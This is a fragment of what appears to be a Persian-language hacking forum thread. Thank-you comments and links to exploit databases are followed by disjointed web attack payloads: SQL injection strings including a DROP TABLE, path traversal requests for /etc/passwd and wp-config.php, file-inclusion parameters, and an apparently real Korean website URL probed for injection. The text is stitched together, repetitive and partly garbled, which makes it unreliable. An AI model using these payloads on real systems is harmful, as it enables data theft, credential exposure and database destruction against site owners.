خسته نباسید
خیلی مفید بود
منتظر قسمت بعدی هستم
خیلی مفید بود
منتظر قسمت بعدی هستم
https://anonalb.al 0day.today exploit-db.com https://www.rapid7.com ....
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
OR 'a'='a
statement := "<syntaxhighlight lang="sql" inline>SELECT * FROM userinfo WHERE id = </syntaxhighlight>" + a_variable + ";"
1;DROP TABLE users
SELECT * FROM userinfo WHERE id=1;DROP TABLE users;
site.com/download.php?filename=video.mp4
site.com/download.php?filename=download.php
site.com/download.php?filename=config.php
dbname dbuser password
site.com/download.php?filename=../../../etc/pa9sswd
site.com/download.php?filename=../../home/user/site.com/public_html/wp-config.php
site.com/main.php?page=home.php site.com/main.php?page=about.php site.com/main.php?page=contact.php site.com/main.php?page=gallery.php or site.com/main.php?page=home site.com/main.php?page=about site.com/main.php?page=contact site.com/main.php?page=gallery
site.com/main.php?page=home.php'
[URL]http://dongraejung.co.kr/main.php?&p=%27[/URL]
نظر